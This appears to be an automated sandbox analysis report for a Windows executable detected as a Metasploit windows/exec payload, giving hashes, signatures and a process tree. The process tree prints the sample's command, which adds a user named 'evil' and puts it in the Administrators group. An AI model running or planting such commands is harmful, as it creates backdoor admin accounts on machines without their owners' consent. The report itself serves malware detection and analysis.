Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
20-04-2024 20:04
Behavioral task
behavioral1
Sample
fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe
Resource
win10v2004-20240412-en
General
-
Target
fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe
-
Size
72KB
-
MD5
fd8918c67d99f1c54e592b5fe79cd104
-
SHA1
9a10e9981c1e4c75c5a9b5253bd86d9057cc4fcf
-
SHA256
c6d32aa42367461bbf30392751a11a894b24afdf53727efcdd21233c798cf1e7
-
SHA512
9f6bc37aca37be6404ba348193608e8f3282a3ca2d879c40d2b467828c7300f0c63156da7e0cc21acff0cfd646ad09ed0ca4b3c0546f35925768ad7c340f9b81
-
SSDEEP
1536:IN/ukRRX3Y/S2SF8TuySzzWMenMb+KR0Nc8QsJq39:y2iRXzWTd1ne0Nc8QsC9
Malware Config
Extracted
metasploit
windows/exec
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.execmd.exenet.exenet.exedescription pid process target process PID 2148 wrote to memory of 3048 2148 fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe cmd.exe PID 2148 wrote to memory of 3048 2148 fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe cmd.exe PID 2148 wrote to memory of 3048 2148 fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe cmd.exe PID 2148 wrote to memory of 3048 2148 fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe cmd.exe PID 3048 wrote to memory of 592 3048 cmd.exe net.exe PID 3048 wrote to memory of 592 3048 cmd.exe net.exe PID 3048 wrote to memory of 592 3048 cmd.exe net.exe PID 3048 wrote to memory of 592 3048 cmd.exe net.exe PID 592 wrote to memory of 324 592 net.exe net1.exe PID 592 wrote to memory of 324 592 net.exe net1.exe PID 592 wrote to memory of 324 592 net.exe net1.exe PID 592 wrote to memory of 324 592 net.exe net1.exe PID 3048 wrote to memory of 1164 3048 cmd.exe net.exe PID 3048 wrote to memory of 1164 3048 cmd.exe net.exe PID 3048 wrote to memory of 1164 3048 cmd.exe net.exe PID 3048 wrote to memory of 1164 3048 cmd.exe net.exe PID 1164 wrote to memory of 1012 1164 net.exe net1.exe PID 1164 wrote to memory of 1012 1164 net.exe net1.exe PID 1164 wrote to memory of 1012 1164 net.exe net1.exe PID 1164 wrote to memory of 1012 1164 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\SysWOW64\cmd.execmd.exe /c net user evil salah /ADD && net localgroup Administrators evil /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\net.exenet user evil salah /ADD3⤵
- Suspicious use of WriteProcessMemory
PID:592 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user evil salah /ADD4⤵PID:324
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators evil /ADD3⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators evil /ADD4⤵PID:1012
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2148-0-0x0000000000020000-0x0000000000021000-memory.dmpFilesize
4KB